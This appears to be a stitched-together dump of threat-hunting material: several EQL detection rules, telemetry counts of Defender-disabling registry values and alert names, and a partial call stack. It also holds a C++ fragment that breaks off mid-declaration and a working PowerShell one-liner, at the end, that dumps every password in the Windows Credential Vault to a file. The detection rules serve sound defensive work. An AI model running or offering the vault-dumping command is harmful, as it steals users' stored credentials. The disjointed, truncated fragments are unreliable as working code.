
// A scripting-host / scripting-runtime process (matched on the PE original file
// name rather than process.name) that is still alive after 300 seconds of
// uptime (ECS process.uptime is in seconds) and then attempts an outbound TCP
// connection from an ephemeral source port to a non-loopback address.
// Both events are joined on process.entity_id.
sequence by process.entity_id
  [process where
     event.action == "start" and
     process.pe.original_file_name : ("cscript.exe", "wscript.exe", "AutoIt*.exe", "python*.exe")]
  [network where
     event.action == "connection_attempted" and
     network.direction == "egress" and
     network.transport == "tcp" and
     // uptime bound is the only time constraint: this sequence has no maxspan,
     // so the first stage's state is held until the network event arrives
     process.uptime >= 300 and
     source.port >= 49152 and
     // loopback destinations are excluded; other local/private ranges are not
     not destination.address : ("127.*", "::1")]
"Top 1000 values of registry.path",Count
"HKLM\SYSTEM\ControlSet001\Services\WinDefend\Start","1,483"
"HKLM\SYSTEM\ControlSet001\Services\UsoSvc\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\WaaSMedicSvc\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\wuauserv\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService\Start",6
"HKLM\SYSTEM\ControlSet001\Services\Sense\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdBoot\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdFilter\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdNisDrv\Start",6
"Top 10000 values of registry.value","Count of records"
TamperProtection,"1,400"
DisableAntiSpyware,"1,388"
DisableBehaviorMonitoring,"1,381"
DisableIOAVProtection,"1,368"
DisableOnAccessProtection,"1,359"
DisableRealtimeMonitoring,"1,344"
DisableScanOnRealtimeEnable,"1,323"
DisableNotifications,"1,312"
AUOptions,"1,280"
"thread": {
"Ext": {
"call_stack_summary": "ntdll.dll|kernelbase.dll|kernel32.dll|acmigration.dll|appraiser.dll|ntdll.dll|kernel32.dll|ntdll.dll",
"call_stack": [
{
"symbol_info": "C:\\Windows\\System32\\ntdll.dll!ZwCreateUserProcess+0x14"
},
{
"symbol_info": "C:\\Windows\\System32\\KernelBase.dll!CreateProcessInternalW+0xfe3"
},
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>
typedef NTSTATUS(NTAPI* pLdrLoadDll) (
PWCHAR PathToFile,
ULONG Flags,
PUNICODE_STRING ModuleFileName,
// Windows Security event 4662 ("An operation was performed on an object")
// recorded as a Directory Service Access, where a single "Read Property"
// access carries a long Properties string and the subject is not the local
// SYSTEM account (S-1-5-18).
any where
  event.action == "Directory Service Access" and
  event.code == "4662" and
  winlog.event_data.AccessListDescription : "Read Property" and
  // length() is the string length of the Properties field; 800 is the
  // author's threshold for "many properties read at once"
  length(winlog.event_data.Properties) >= 800 and
  // drop reads performed by the local SYSTEM SID
  not winlog.event_data.SubjectUserSid : "S-1-5-18"
"Top 1000 values of rule.name","Count of records"
"Connection to WebService by a Signed Binary Proxy",342
"Managed .NET Code Execution via PowerShell",79
"Execution via a Suspicious WMI Client",57
"Credential Access via Known Utilities",40
"Regsvr32 Scriptlet Execution",39
"Suspicious Bitsadmin Activity",34
"Suspicious Windows Command Shell Execution",32
"Script Execution via Microsoft HTML Application",28
"Suspicious Execution via Windows Management Instrumentation",27
// svchost.exe started with "appmodel" in its arguments that, within 3 seconds,
// accepts an inbound connection where both endpoints are on ephemeral ports and
// the peer is not loopback. Joined on host.id and process.entity_id.
sequence by host.id, process.entity_id with maxspan=3s
  [process where
     event.type == "start" and
     process.name : "svchost.exe" and
     process.args : "appmodel"]
  [network where
     event.action == "connection_accepted" and
     process.name : "svchost.exe" and
     // both ends on ephemeral ports (>= 49152)
     source.port >= 49152 and
     destination.port >= 49152 and
     // ignore loopback peers (exact IPv4/IPv6 loopback literals only)
     source.ip != "127.0.0.1" and
     source.ip != "::1"]
// A value written under the per-user or per-machine Run key followed, within
// one minute, by the start of the program that value points to, where that
// program's file was created shortly beforehand. The two stages are joined on
// the Run value data (registry.data.strings) against the started process's
// path (process.executable), in addition to host.id.
sequence by host.id with maxspan=1m
  [registry where
     registry.path : "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*"
  ] by registry.data.strings
  [process where
     event.action == "start" and
     // recently created executable; 500 is the author's threshold in the
     // units of process.Ext.relative_file_creation_time (endpoint-specific field)
     process.Ext.relative_file_creation_time < 500
  ] by process.executable
# Loads the WinRT Windows.Security.Credentials.PasswordVault type into the
# session, enumerates every vault entry with RetrieveAll(), calls
# RetrievePassword() on each entry before emitting it, and redirects the
# resulting objects to the relative path "pwds.tmp".
# Defender note: the WinRT type load of Windows.Security.Credentials from
# PowerShell, the RetrievePassword() call, and the "pwds.tmp" file write are the
# observable artifacts of this credential-access behaviour.
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
(new-object Windows.Security.Credentials.PasswordVault).RetrieveAll()|%{$_.RetrievePassword();$_}>"pwds.tmp"